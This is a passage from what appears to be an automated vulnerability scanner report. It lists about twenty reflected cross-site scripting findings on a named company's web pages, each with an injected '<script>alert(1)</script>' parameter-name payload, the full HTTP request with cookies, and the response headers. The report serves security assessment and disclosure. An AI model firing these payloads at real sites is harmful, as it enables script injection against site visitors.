1.38. http://skillsoft.com/about/press_room/in_the_news.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/press_room/in_the_news.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc940"><script>alert(1)</script>24fee44c4cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/press_room/in_the_news.asp?bc940"><script>alert(1)</script>24fee44c4cf=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 92836 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5feed"><script>alert(1)</script>e48f5886a1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/press_room/press_releases/December_09_10_Awards.asp?5feed"><script>alert(1)</script>e48f5886a1b=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48655 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.40. http://skillsoft.com/about/press_room/press_releases/December_10_10_Financials.asp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31eb6"><script>alert(1)</script>11217fc0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/press_room/press_releases/December_10_10_Financials.asp?31eb6"><script>alert(1)</script>11217fc0150=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 167338 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.41. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c113"><script>alert(1)</script>c731fb21e72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/press_room/press_releases/December_13_10_ThomasNelson.asp?4c113"><script>alert(1)</script>c731fb21e72=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50456 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.42. http://skillsoft.com/about/press_room/press_releases/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/press_room/press_releases/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d978"><script>alert(1)</script>38d223843dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/press_room/press_releases/default.asp?7d978"><script>alert(1)</script>38d223843dc=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 135638 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.43. http://skillsoft.com/about/worldwide.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/about/worldwide.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9583c"><script>alert(1)</script>eb7bb63440c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/worldwide.asp?9583c"><script>alert(1)</script>eb7bb63440c=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 40473 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.44. http://skillsoft.com/error.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/error.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f40c1"><script>alert(1)</script>203cbbf39fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /error.asp?f40c1"><script>alert(1)</script>203cbbf39fc=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33310 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.45. http://skillsoft.com/privacy.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/privacy.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 264cc"><script>alert(1)</script>326d02d253b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /privacy.asp?264cc"><script>alert(1)</script>326d02d253b=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48353 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.46. http://skillsoft.com/products/BES.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/BES.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46096"><script>alert(1)</script>56cd8af9534 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/BES.asp?46096"><script>alert(1)</script>56cd8af9534=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47315 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.47. http://skillsoft.com/products/KnowledgeCenters/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/KnowledgeCenters/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27401"><script>alert(1)</script>77c271812f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/KnowledgeCenters/default.asp?27401"><script>alert(1)</script>77c271812f5=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 57507 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.48. http://skillsoft.com/products/LDC/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/LDC/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f48e7"><script>alert(1)</script>051c3490341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/LDC/default.asp?f48e7"><script>alert(1)</script>051c3490341=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48437 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:47:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.49. http://skillsoft.com/products/SLA/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/SLA/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ada9"><script>alert(1)</script>883a4b16204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/SLA/default.asp?5ada9"><script>alert(1)</script>883a4b16204=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50008 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.50. http://skillsoft.com/products/SkillChoice_Solutions.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/SkillChoice_Solutions.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d98"><script>alert(1)</script>c64a9160c15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/SkillChoice_Solutions.asp?a5d98"><script>alert(1)</script>c64a9160c15=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50523 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.51. http://skillsoft.com/products/SkillPort/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/SkillPort/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62511"><script>alert(1)</script>7687536f2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/SkillPort/default.asp?62511"><script>alert(1)</script>7687536f2c7=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 53382 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.52. http://skillsoft.com/products/SkillSoft_Select.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/SkillSoft_Select.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3202f"><script>alert(1)</script>e925bc0504c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/SkillSoft_Select.asp?3202f"><script>alert(1)</script>e925bc0504c=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50661 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.53. http://skillsoft.com/products/course_collections/IT_professional.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/IT_professional.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff73b"><script>alert(1)</script>34f6fbc56f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/IT_professional.asp?ff73b"><script>alert(1)</script>34f6fbc56f5=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51026 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:45:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.54. http://skillsoft.com/products/course_collections/Sun.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/Sun.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5588"><script>alert(1)</script>ae8110e2793 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/Sun.asp?d5588"><script>alert(1)</script>ae8110e2793=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47369 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:47:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.55. http://skillsoft.com/products/course_collections/business_skills.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/business_skills.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47fea"><script>alert(1)</script>85aa98088ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/business_skills.asp?47fea"><script>alert(1)</script>85aa98088ed=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54502 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.56. http://skillsoft.com/products/course_collections/compliance.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/compliance.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727c3"><script>alert(1)</script>11f582872a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
